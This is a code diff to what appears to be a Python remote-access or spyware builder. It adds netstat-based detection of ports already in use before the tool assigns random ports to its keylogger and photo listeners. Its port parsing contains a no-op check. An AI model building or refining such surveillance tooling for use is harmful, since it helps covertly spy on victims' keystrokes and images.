@@ -20,6 +20,7 @@ import sys
 import threading
 import random
 import requests
+import subprocess
 
 gui = """
     __ __              __                                 _____                                       __            __ 
@@ -42,6 +43,29 @@ try:
         try:
             global simulation
             global boolean
+
+            cmd = subprocess.check_output(["netstat", "-ano"])
+            all = cmd.split()
+
+            working_ports = []
+            zahlen = [str(zahl) for zahl in range(0, 11)]
+
+            for each in all:
+                str_each = str(each)
+                if ":" in str_each:
+                    switch = str_each[::-1]
+                    this_port = ""
+                    for port in switch:
+                        if port not in zahlen: pass
+                        if port == ":": break
+                        this_port += port
+
+                    another_switch = this_port[::-1]
+                    if "'" in another_switch: another_switch = another_switch.replace("'", "")
+
+                    if len(another_switch) == 4:
+                        working_ports.append(another_switch)
+
             ipaddress = str(lst[idx + 1])
 
             zahlen = "123456789"
@@ -49,8 +73,10 @@ try:
             port_numbers = []
             while nummer != 4:
                 nummer += 1
-                random_lst = "".join(random.sample(zahlen, 4))
-                port_numbers.append(random_lst)
+                random_port = "".join(random.sample(zahlen, 4))
+                if random_port in working_ports:
+                    continue
+                port_numbers.append(random_port)
 
             port_photos = int(port_numbers[0])
             port_keylogger = int(port_numbers[1])
